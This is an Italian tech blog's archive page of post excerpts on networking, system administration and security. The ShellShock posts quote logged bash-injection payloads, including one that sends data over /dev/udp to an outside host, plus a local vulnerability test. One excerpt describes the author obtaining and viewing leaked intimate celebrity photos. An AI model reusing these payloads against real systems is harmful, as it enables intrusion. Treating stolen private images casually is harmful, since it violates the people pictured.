Autore: Luigi Rosa

  • Tunnel IPv6 di HE con OpenWRT

    OpenWrtDopo l’esperienza di Fabrizio, mi sono deciso ad usare un OpenWRT per il tunnel IPv6 di Hurricane Electic.

    Avevo a disposizione un Netgear DG834GT gentilmente donato da Riccardo per questo scopo e ho deciso di metterlo finalmente in pista.

    Avevo installato OpenWRT Backfire tanto tempo fa, ma non avevo ancora avuto l’occasione di provarlo seriamente sul campo. Dopo alcuni disservizi della linea ADSL di casa ho riconfigurato la rete casalinga eliminando la VM con pfSense e semplificando un po’ la configurazione. Tuttavia questo mi aveva fatto perdere la possibilità di usare pfSense come gestore del tunnel IPv6. (altro…)

  • Tentativi di exploit di ShellShock

    Poco tempo dopo l’annuncio di ShellShock i tentativi di hacking sono già iniziati.

    Questa mattina i log di alcuni server che amministro rivelano quasi tutti l’accesso con masscan spiegato in questo articolo, ma si tratta di un’analisi, non di un tentativo vero e proprio di sfruttare la vulnerabilità. In questo caso la stringa richiesta via http è quella che si vede nell’articolo.

    Anche il servizio di hosting Snel sta facendo passare la rete alla ricerca di host vulnerabili dall’IP 89.207.135.125:

    “GET /cgi-sys/defaultwebpage.cgi HTTP/1.0” 404 63579 “-” “() { :;}; /bin/ping -c 1 198.101.206.138”

    Un altro apparente test, ma con richieste più dettagliate arriva dall’IP 54.251.83.67 appartenente al cloud computing di Amazon:

    “GET / HTTP/1.1” 200 4093 “-” “() { :;}; /bin/bash -c \”echo testing9123123\”; /bin/uname -a”

    Altro tentativo dal 24.251.197.244, un IP di Cox:

    “GET / HTTP/1.1” 200 208051 “-” “() { :; }; echo -e \”Content-Type: text/plain\\n\”; echo qQQQQQq”

    Decisamente il meno amichevole di tutti il tentativo che proviene dall’IPv6 2001:4800:7812:514:1b50:2e05:ff04:c849 di un datacentre americano di RackSpace

    “GET / HTTP/1.1” 200 208133 “-” “() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444”

    Notare qui l’uso di /dev/udp descritto in questo articolo.

  • ShellShock

    È stato scoperto un baco serio in bash, che consente, in determinate situazioni, ad un attaccante di eseguire programmi arbitrari sul computer della vittima (RCE, Remote Code Execution).

    bash è probabilmente la shell più diffusa tra i sistemi *NIX, in quanto è la shell di default della gran parte delle distribuzioni Linux ed è la shell utilizzata da OSX.

    La shell è il programma che permette all’utente di eseguire altri programmi, interagire con il file system e il sistema operativo ed eseguire altre azioni in relazione all’ambiente e al tipo di shell. Oltre a bash, gli ambienti *NIX hanno, tra le altre, zsh, csh, sh. La shell di Windows è Explorer.exe, prima di Windows c’era COMMAND.COM, che alcuni sostituivano con 4DOS.

    Il metodo veloce per scoprire se una bash è vulnerabile è eseguire questo comando:

    env x='() { :;}; echo vulnerabile' bash -c "echo io sono un test"

    Se bash non ritorna un warning, ma scrive semplicemente vulnerabile e poi io sono un test, la bash è vulnerabile.

    Innanzi tutto: non è vero che ogni computer che ha bash a bordo è vulnerabile per il fatto di avere bash a bordo.

    (altro…)

  • La burocrazia .IT

    John Maynard Keynes (via Wikipedia)La mia esperienza con la registrazione dei nomi a dominio e la loro amministrazione) inizia dal 1994.

    Ricordo ancora le regole dei .IT come un solo nome a dominio per ogni società, i fax illeggibili che venivano rifiutati, i controlli periodici di raggiungibilità dell’utente postmaster, con relativi report nella mailing list del GARR, le registrazioni respinte perché il TTL non era quello desiderato o perché non c’era un record MX (il TTL e il record MX venivano corretti 5 minuti dopo l’avvenuta registrazione e nessuno si lamentava o revocava la registrazione).

    Insomma, tutta la burocrazia .IT dei primi anni.

    Nel 2014 i .IT si possono registrare senza inviare la LAR (che sia della versione corrente! poco importa se la rimandi cambiando solo il numero di versione e viene accettata comunque) e i documenti di identità via fax; ora tutti i registrar possono registrare un nome a dominio senza passare carta, esattamente come i .COM

    Non esattamente. (altro…)

  • Bypassare i “blocchi” di alcuni siti

    Alcuni siti “bloccano” i contenuti sovrapponendo alla pagina un layer traslucido tipo <div style="opacity: 0.5; visibility: visible;"> e una finestra con richieste varie.

    Alcune volte il contenuto vero e proprio è presente (quindi è stato inviato al client), ma non è normalmente fruibile finché non se ne vanno la finestra di richieste e il layer semi opaco.

    Con Google Chrome si può facilmente eliminare il contenuto scocciante con questi semplici passaggi:

    • click destro + Inspect Element (l’ultima voce che appare)
    • appare nella parte inferiore il sorgente HTML della pagina
    • scorrere il codice dall’inizio e fermarsi quando viene evidenziato l’elemento da rimuovere
    • fare click destro sul codice e selezionare Delete Node
    • ripetere se restano altri pezzi da togliere
    • voilà!

    Esistono metodi analoghi con plugin o altri browser.

  • Uccide più una penna…

    Questo video mi è stato segnalato da Paolo Attivissimo.

    Le penne che hanno approvato il disegno fallato non hanno solamente stroncato le vite di Francis R. Scobee, Michael J. Smith, Ronald McNair, Ellison Onizuka, Judith Resnik, Greg Jarvis e Christa McAuliffe, ma hanno contribuito a ritardare il sogno di una vita nello spazio. Cola più sangue dalla penna di certi burocrati meschini, avidi e insignificanti che dalle mani di efferati criminali. Burocrati, legulei, azzeccagarbugli e passacarte assimilati: finirete tutti nel cestino dell’immondizia della Storia.

    Fatal accidents never happen because of just one mistake.It takes a whole chain of stupids lining up just so to put a full stop at the end of an epitaph. (Charles Stross, Fuller Memorandum)

  • Sicurezza, trasparenza, facilità d’uso

    Lascio all’articolo precedente lo sviluppo del lato tecnico della storia del furto di immagini, qui vorrei fare qualche commento.

    In molti abbiamo perso dei dati o abbiamo scoperto che per un errore (nostro o informatico) alcuni dati sono finiti in un contesto pubblico quando sarebbero dovuti rimanere privati. Ma quando si tratta di parti intime di persone famose o dei loro partner l’evento diventa una notizia. (altro…)

  • Dati tra le nuvole

    Bella la funzione di storage automatico sul cloud online, ma…

    Non è la prima volta che succede un casino e sicuramente non è nemmeno l’ultima, ma questa ha tutti i connotati delle 5 S di un certo giornalismo (sesso, sesso, sesso, sesso, sesso).

    È oramai noto che sarebbero state trafugate delle foto molto personali di alcune celebrità.

    Ho recuperato alcune foto da una fonte che credo sia attendibile e ne ho guardate un po’. Enfasi su un po’ perché dopo la l’n-sima serie di tette, fighe e culi ripresi male in contesti privati uno si stufa anche.

    (altro…)
  • Cercare nel punto giusto

    Linux performance tools by Brendan Gregg«Il server è lento».

    Una frase molto comune che tutti possono pronunciare. La ricerca delle cause dei rallentamenti spesso non è così semplice perché non è affatto detto che la causa sia una sola né che risieda all’interno del server.

    Diversamente da Windows, Linux ha una struttura interna ben documentata al pubblico, inoltre negli anni sono stati sviluppati molti tool a livello utente che permettono di compiere analisi molto dettagliate sullo stato del kernel e del sistema e consentono di modificare i parametri operativi di funzionamento, molti dei quali senza riavviare il sistema operativo.

    Brendan Gregg, Senior Performance Architet di Netflix, ha fatto un lavoro encomiabile di raccolta e catalogazione dei tool che possono aiutare il SysAdmin nella ricerca dei problemi e nella loro soluzione.

    Sul sito ci sono alcune immagini come quella riportata in questo articolo che aiutano a capire quale sia il tool giusto per operare nel punto in cui si vuole analizzare il problema o modificare un parametro.

    Per chi ha a che fare con problemi di performance delle macchine Linux, la pagina di Brendan è un ottimo punto di partenza che guida il SysAdmin nell’analisi dei problemi.

  • Chrome stabile a 64bit

    Google ChromeLa versione 37 per Windows di Google Chrome a 64 bit è ora dichiarata stabile.

    Da questa versione, quindi, è possibile utilizzare il browser su una versione di Windows supportata a 64 bit.

    Il passaggio alla versione a 64 bit comporta molti benefici, tra cui una maggiore velocità nella visualizzazione delle pagine e dei contenuti multimediali. Naturalmente ci sono anche dei benefici legati alla sicurezza: il codice a 64 bit riesce ad implementare meglio alcune contromisure codificate nel browser.

    In questa versione non sono più supportate le NPAPI, le API per i plugin introdotte da Netscape Navigator 2.0, che sono oramai passate alla storia e non sono comunque supportate dai dispositivi mobili.

    L’installazione della versione a 64 bit è per il momento opzionale e quella a 32 bit verrà ancora supportata per lungo tempo.

    (altro…)

  • La zuppa di petali di rosa

    Ogni tanto qualcuno pensa che una zuppa di petali di rosa sia migliore di una zuppa di cipolle perché le rose sono più belle delle cipolle.

    Stefano Quintarelli segnala la notizia che il Comune di Monaco farà dietrofront e rimetterà Windows sui suoi PC su cui aveva messo LiMux, una distribuzione Linux creata da loro.

    Ci sono molte cause, a mio modo di vedere, del fallimento di questo progetto.

    La prima è l’approccio autarchico al problema. Linux fa parte di un ecosistema collaborativo che permette a tutti di non inventare la ruota ogni mese, ma di prendere la ruota migliore possibile, apportare piccole modifiche o migliorie, utilizzarla per sé e condividerla con gli altri. Monaco ha avuto l’arroganza di voler gestire una distribuzione Linux, ma non è il mestiere di un ente pubblico, meglio lasciarlo fare a chi è capace. LiMux è stato addirittura certificato ISO9241: un approccio open e collaborativo sarebbe stata la proposta di patch a KDE e la certificazione ISO di KDE. In questo modo ne avrebbero beneficiato tutti e, magari, la comunità avrebbe lavorato per migliorare ulteriormente KDE, facendo in modo che anche Monaco ne traesse un beneficio. (altro…)

  • WAMP su Windows 7

    Questo articolo spiega come configurare una struttura WAMP su un Windows 7 installando i singoli programmi separatamente.

    Esistono anche dei kit preconfezionati come, a puro titolo di esempio, EasyPHP, ma è più istruttivo costruire da soli la propria configurazione in quanto si imparano meglio il funzionamento e l’interazione dei vari componenti, si possono aggiornare i singoli programmi senza dipendere da terzi ed è molto più semplice di quello che si possa credere. Le istruzioni di seguito partono da alcuni presupposti e hanno alcune limitazioni, tra cui:

    • l’installazione non ha una sicurezza adatta ad un server pubblico, ma è pensata per un server di sviluppo protetto da altri metodi;
    • la piattaforma su cui viene installato il tutto è un Windows 7 a 64 bit e, dove possibile, vengono installate le versioni a 64 bit dei programmi;
    • vengono installate le ultime versioni disponibili dei software cercando il più possibile di mantenere i default;
    • tutti i download suggeriti riguardano solamente programmi gratuiti, anche se per alcune utility esistono alternative a pagamento;
    • ripeto: non usate questa procedura per configurare un server pubblicato su Internet.

    Queste istruzioni sono valide per le ultime versioni di Apache (2.4), PHP (5.5) e MariaDB (10.0), con versioni precedenti potrebbero essere necessarie ulteriori modifiche o accorgimenti per far funzionare il tutto. (altro…)